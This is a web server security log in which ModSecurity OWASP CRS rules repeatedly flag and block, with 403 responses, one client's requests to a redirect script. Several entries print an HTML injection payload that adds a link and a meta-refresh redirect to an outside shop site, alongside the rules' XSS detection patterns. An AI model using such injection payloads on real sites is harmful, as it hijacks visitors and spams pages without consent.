[Tue May 12 06:27:25.220283 2026] [security2:error] [pid 1842385:tid 1842410] [client 27.78.84.116:59817] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"]  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLRs7kySIUZ3ORnI41QAAARM"]
[Tue May 12 06:27:25.220394 2026] [security2:error] [pid 1842385:tid 1842410] [client 27.78.84.116:59817] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLRs7kySIUZ3ORnI41QAAARM"]
[Tue May 12 06:27:25.220562 2026] [security2:error] [pid 1842385:tid 1842410] [client 27.78.84.116:59817] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLRs7kySIUZ3ORnI41QAAARM"]
[Tue May 12 06:27:25.221006 2026] [security2:error] [pid 1842385:tid 1842410] [client 27.78.84.116:59817] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLRs7kySIUZ3ORnI41QAAARM"]
[Tue May 12 06:27:25.221261 2026] [security2:error] [pid 1842385:tid 1842410] [client 27.78.84.116:59817] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLRs7kySIUZ3ORnI41QAAARM"]
[Tue May 12 06:27:25.922716 2026] [security2:error] [pid 1844863:tid 1844877] [client 27.78.84.116:59880] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLfaAnTZtx1_H_wzJzQAAAUg"]
[Tue May 12 06:27:25.923128 2026] [security2:error] [pid 1844863:tid 1844877] [client 27.78.84.116:59880] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh c..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLfaAnTZtx1_H_wzJzQAAAUg"]
[Tue May 12 06:27:25.923295 2026] [security2:error] [pid 1844863:tid 1844877] [client 27.78.84.116:59880] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"]  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLfaAnTZtx1_H_wzJzQAAAUg"]
[Tue May 12 06:27:25.923409 2026] [security2:error] [pid 1844863:tid 1844877] [client 27.78.84.116:59880] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLfaAnTZtx1_H_wzJzQAAAUg"]
[Tue May 12 06:27:25.923579 2026] [security2:error] [pid 1844863:tid 1844877] [client 27.78.84.116:59880] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLfaAnTZtx1_H_wzJzQAAAUg"]
[Tue May 12 06:27:25.924008 2026] [security2:error] [pid 1844863:tid 1844877] [client 27.78.84.116:59880] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLfaAnTZtx1_H_wzJzQAAAUg"]
[Tue May 12 06:27:25.924288 2026] [security2:error] [pid 1844863:tid 1844877] [client 27.78.84.116:59880] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLfaAnTZtx1_H_wzJzQAAAUg"]
[Tue May 12 06:27:26.627008 2026] [security2:error] [pid 1820198:tid 1820208] [client 27.78.84.116:59967] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLs1tk6y7yBJLpJpISwAAAIg"]
[Tue May 12 06:27:26.627420 2026] [security2:error] [pid 1820198:tid 1820208] [client 27.78.84.116:59967] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh c..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLs1tk6y7yBJLpJpISwAAAIg"]
[Tue May 12 06:27:26.627573 2026] [security2:error] [pid 1820198:tid 1820208] [client 27.78.84.116:59967] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"]  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLs1tk6y7yBJLpJpISwAAAIg"]
[Tue May 12 06:27:26.627696 2026] [security2:error] [pid 1820198:tid 1820208] [client 27.78.84.116:59967] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLs1tk6y7yBJLpJpISwAAAIg"]
[Tue May 12 06:27:26.627865 2026] [security2:error] [pid 1820198:tid 1820208] [client 27.78.84.116:59967] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLs1tk6y7yBJLpJpISwAAAIg"]
[Tue May 12 06:27:26.628304 2026] [security2:error] [pid 1820198:tid 1820208] [client 27.78.84.116:59967] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLs1tk6y7yBJLpJpISwAAAIg"]
[Tue May 12 06:27:26.628612 2026] [security2:error] [pid 1820198:tid 1820208] [client 27.78.84.116:59967] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLs1tk6y7yBJLpJpISwAAAIg"]
[Tue May 12 06:27:27.319118 2026] [security2:error] [pid 1825179:tid 1825209] [client 27.78.84.116:60062] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsL9r1yOh9Tvizeziw0QAAAEs"]
[Tue May 12 06:27:27.319507 2026] [security2:error] [pid 1825179:tid 1825209] [client 27.78.84.116:60062] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh c..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsL9r1yOh9Tvizeziw0QAAAEs"]
[Tue May 12 06:27:27.319656 2026] [security2:error] [pid 1825179:tid 1825209] [client 27.78.84.116:60062] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"]  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsL9r1yOh9Tvizeziw0QAAAEs"]
[Tue May 12 06:27:27.319769 2026] [security2:error] [pid 1825179:tid 1825209] [client 27.78.84.116:60062] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsL9r1yOh9Tvizeziw0QAAAEs"]
